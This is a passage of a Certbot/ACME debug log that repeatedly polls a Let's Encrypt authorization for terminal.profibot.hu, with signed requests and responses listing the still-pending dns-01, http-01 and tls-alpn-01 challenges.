23:21:35,039:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:35,040:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:34 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblQUSdvU6Wi_a06bKtFOSdoawPOEwJLCE7qpqFC81JtoU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:35,040:DEBUG:acme.client:Storing nonce: _aMw-OblQUSdvU6Wi_a06bKtFOSdoawPOEwJLCE7qpqFC81JtoU +2026-01-27 23:21:35,041:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:21:38,042:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:38,044:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibFFVU2R2VTZXaV9hMDZiS3RGT1Nkb2F3UE9Fd0pMQ0U3cXBxRkM4MUp0b1UiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "akaXpiAdfmOeavQartHjTLByD8tdN2ORj_9tagTI82E2yStZz5t0ojMAYm1ReKFmYtVW3J--MbMbzVMyrMkFh1-biz9dNpOvOLo65hbmbaBM9J2ibIb5ld2jl7zmX63Q_WHwB2gzMtWTyvR5WTwUpYFKaRChEETPBQLCXMPIFn1InjBTAtKjEvZbt3w3nOCx3EtJURnDjMNvr2qCrCUKAV3K2A-I2_80p9oEc0FsBGEqdw-P8XgZtUFLaWRAuQ5AzKRBtlTv0LuNZZ9vY-jBjcMm2jqlWhFE0BJNdJt4mzVnpc2rUqvl7KX-php5y5ywBGubHJRqXrTHrpFxCoRQTg", + "payload": "" +} +2026-01-27 23:21:38,213:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:38,214:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:38 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblQmNyi_QgLMYT3p18mMpkdMkcPx3DDJCOy5406dHtv0w +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:38,214:DEBUG:acme.client:Storing nonce: _aMw-OblQmNyi_QgLMYT3p18mMpkdMkcPx3DDJCOy5406dHtv0w +2026-01-27 23:21:38,215:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:21:41,216:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:41,219:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibFFtTnlpX1FnTE1ZVDNwMThtTXBrZE1rY1B4M0RESkNPeTU0MDZkSHR2MHciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "TkVQYc3_2bFG3vtdHC1sIKh54shQkjl3yNOuod8rk4Rp8SN9bflqj4yUjasa5rnAqDdBI4x-8fpttYWaaJFOw2Lzt0lYfpL0nyGLWXAJXGcUHeYmDkx7ZKo3iyJba50eQfTfqsZs6F8WLgJaOdZB45zav7bBdLN89rfaG6udD5cxbmnZBANTXSHcgHaYBrN9yVDiP8jLNfq1sY30oHNRIn1mhFpTlhhWpk9Kg0LStVHIP3spPw33zL9SRxLg03NH0X2kzImRr8fO12DJJkLSrR7zGz8VezB1DvPtddKgFzzQ_TvWGrqkzppg5gRXju7d79oFAbBYgggDmwu7mfDUdg", + "payload": "" +} +2026-01-27 23:21:41,374:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:41,375:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:41 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblSWBwQypm3iwU3Bv0EYucnpUbidrMYo97E1TTyMcw0iw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:41,375:DEBUG:acme.client:Storing nonce: _aMw-OblSWBwQypm3iwU3Bv0EYucnpUbidrMYo97E1TTyMcw0iw +2026-01-27 23:21:41,376:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:21:44,377:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:44,381:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibFNXQndReXBtM2l3VTNCdjBFWXVjbnBVYmlkck1Zbzk3RTFUVHlNY3cwaXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "kXTiy99vdls-pNm6gvFA9lC6FbQnlsw6HM5lbvE0OOq0gn3psmDtWy_153Gq6tSoofzw234wpsFZQZGNXOuzYpa35hzMW5VrOPe4RcNct46mPw0ugcbE0rGiKNvcSxTVq_pf34Lmtgz_AFvieVoaFlUjKKle6fxL95fTD4DBR6lRAC6IwKLF1tUGtk_4PNFwjTQQxFew8VA9BWlqHHzkjZhBo-YNz391PlbqYAbPkZyFoy6wupxmyjVN5daZCdCSPYGvRPVKAd3FP8B3nYY-zgRsmDYvitKF5pRbnu4lrvlPfaVl1KfvM4xNiSWKcFBdcC3lz6qWb-S4USWwzMHn3w", + "payload": "" +} +2026-01-27 23:21:44,538:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:44,539:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:44 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblCLbPDQ2i3Lh-NOjWHna0fAcIW3_9NiUSMYC9uHwBIKk +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:44,539:DEBUG:acme.client:Storing nonce: _aMw-OblCLbPDQ2i3Lh-NOjWHna0fAcIW3_9NiUSMYC9uHwBIKk +2026-01-27 23:21:44,540:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:21:47,541:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:47,545:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibENMYlBEUTJpM0xoLU5PaldIbmEwZkFjSVczXzlOaVVTTVlDOXVId0JJS2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "F79DPRze3jmJ1tVzl57CVxj6-qwLXoUwIKuAqK6DcdruBzjE1e452K3gKR3kMjGUnUk3KgQkrI1ktu_YGQFzgAcFegeuI4p37t73ujckNPaKP0Z-sI0nIHCZCeneXlg48cgm3RJ_uGFys3uvolQKQUxwrzvyjVAbcvBD982A56LFns5DUcAS5_08VwDgumxtnwcBsOr74zrp-g8EvWLnT8Sr_2KNJz5PIMkPX-Xn80g2C7MC5djjf9FaLj6jvSJkScM0DNldBqnW9gD8TQJnfSNspkxvfve5v6mgvoW6zoB99D7u_W0stQX3ciTK5B0iPCIiM_cCW8AGJL78FNnnGQ", + "payload": "" +} +2026-01-27 23:21:47,701:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:47,702:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:47 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 3aiLGgPYOTlcvSCavITWRXx28auLj2QeEi78syvdZYuHs0q5I9M +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:47,702:DEBUG:acme.client:Storing nonce: 3aiLGgPYOTlcvSCavITWRXx28auLj2QeEi78syvdZYuHs0q5I9M +2026-01-27 23:21:47,703:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:21:50,704:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:50,708:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICIzYWlMR2dQWU9UbGN2U0NhdklUV1JYeDI4YXVMajJRZUVpNzhzeXZkWll1SHMwcTVJOU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "Ih1c5NIekpz-X3XIJ4ulz2nuEKhzR_tCbZPUSj28kd5Ur_4I9iu9GPo4IuWZuDQmA_3FtDeeYSGWmMfetYLkUqoqyXmY67aJFT_kDq47T1r0evWWyruQWTbf3mBCAsKI7Vcf-hzOQHFUbcWZ0h-Rn3GoCNznDXLgQDa_nZcxJGuFTpp2emqW0AwcJKxSN0ZGaE2D9N-nrw7Qhvsp7h0zIWkg5jyyQhePvp3VAA0TY-RmcYxlCDBExgFM5b9gSAu4foPuI0w73QOvPCo6CSNio5_dF75zF2iFXtOQnSqkDy1enwWY_hbV9rnnUbdl-UPMlBgGjQlOMWHvTU7VAXOn-Q", + "payload": "" +} +2026-01-27 23:21:50,865:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:50,866:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:50 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-Oblnl6rkvoR2_aiOp4CjWm7kdg3m8dqxFAscrgjItmq-wM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:50,866:DEBUG:acme.client:Storing nonce: _aMw-Oblnl6rkvoR2_aiOp4CjWm7kdg3m8dqxFAscrgjItmq-wM +2026-01-27 23:21:50,867:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:21:53,868:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:53,871:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibG5sNnJrdm9SMl9haU9wNENqV203a2RnM204ZHF4RkFzY3Jnakl0bXEtd00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "EPnxijgDQ25-LBa2Zw7OLUvNk3atiPVQzcNMCS4Z3HzYxD_4dz7AoSXr383Fnnl-wJtdALA8nbndu7c41nnjfYTgE7ApdhTho_-r5sal60DGYr0KxgByTIq_zex348m1dEdpf6qrTF_wXORMEBticBwgcjv65kvCSMooOHSpBEdzIjP3Yav49nQnQRH0sUfcPwUyzStrGDuylDSCgE9s-_MPBsbVYhixMNg8sy9tZpzHqBA6HfllbeUaZbIteSPRCjxk7JQIFQJKzWLrsCSHD_PjfMbUb1DZzRLsYsKfO31YyQCs_mD3GxT9mrYKVRUa2qbXTbY2zp7PPfGLJsBGVg", + "payload": "" +} +2026-01-27 23:21:54,028:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:54,029:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:53 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblWzjPRDO3bBQqTAvdd6G35b5AgXcLYEaGBU2AYjBkQkw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:54,029:DEBUG:acme.client:Storing nonce: _aMw-OblWzjPRDO3bBQqTAvdd6G35b5AgXcLYEaGBU2AYjBkQkw +2026-01-27 23:21:54,030:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:21:57,031:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:57,035:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibFd6alBSRE8zYkJRcVRBdmRkNkczNWI1QWdYY0xZRWFHQlUyQVlqQmtRa3ciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "C4ybK0Yt3aZGIqgBR74Cq5wHPE5hmgo5SI796nW4N2JHNAsT2QJkHscfLPytl5vaIJRTFBwwGu86_lvlsvv4wfDF8MnOc_9N7ItbuGk52a1i_lACk_76cAxlOYWLexyQSNgkZjMwqgI9KD3zWi2wmmGakC0FFJuQouGNn-dNu3hG6jGeG1Q3_-J4czi4BKXl8_JE3MWJ61wvYqTa9hGD6GsaxuxxoDs6RDWWB-mUEudHLz77auSqY0Syfb5nWzMBq4dUHX2jmbvuT1F-IVlUX9ZVJU1sRb5rupkRmyBBCzbxxhR4KIaCKndHoNUbgN6duS0d3_NDrJW0FLS2c1u4jw", + "payload": "" +} +2026-01-27 23:21:57,190:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:57,191:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:57 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 3aiLGgPYArQTOBWb8pk5d1gieDjSA4hXJpOu8l5KdgyT66rdeKg +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:57,191:DEBUG:acme.client:Storing nonce: 3aiLGgPYArQTOBWb8pk5d1gieDjSA4hXJpOu8l5KdgyT66rdeKg +2026-01-27 23:21:57,192:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:22:00,193:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:22:00,196:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICIzYWlMR2dQWUFyUVRPQldiOHBrNWQxZ2llRGpTQTRoWEpwT3U4bDVLZGd5VDY2cmRlS2ciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "dDMfhORj0hh4HNGwXchsoAK4a3REZn_8uU8NwGKvAwh_COjHxfaK3ZLDzCQVybqOI-Uru0q4KtT1agFxPlbS9AmyLy1cxL0ZqeFVx8zYf8GkvT1rjhZrvn4WjWHuJiyM54t7bt2eIPHPkP1DBqlJ8bRqsoU2pCjW5ehkH3SJaua7ewLyDMF1gPwdcANVfDcKwh7GBoYFZjHKJKYGuW21ZXNXgTpFIvlMWpa5XvqD_-Y1EFhIDogDRGZk7e_jTvtYFy8-Otw46abrvisUSXsP4NDQIPiQC34DG1ZZZaLE0i7070gZQlJC98jHt6s0SlidDaFI3jNMDZa1v3E6nYQlvQ", + "payload": "" +} +2026-01-27 23:22:00,351:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:22:00,351:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:22:00 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblOxPq4g4hM-82xq3vjzOtQqQwNv-1eobsdxuVpadSKgc +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:22:00,352:DEBUG:acme.client:Storing nonce: _aMw-OblOxPq4g4hM-82xq3vjzOtQqQwNv-1eobsdxuVpadSKgc +2026-01-27 23:22:00,352:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 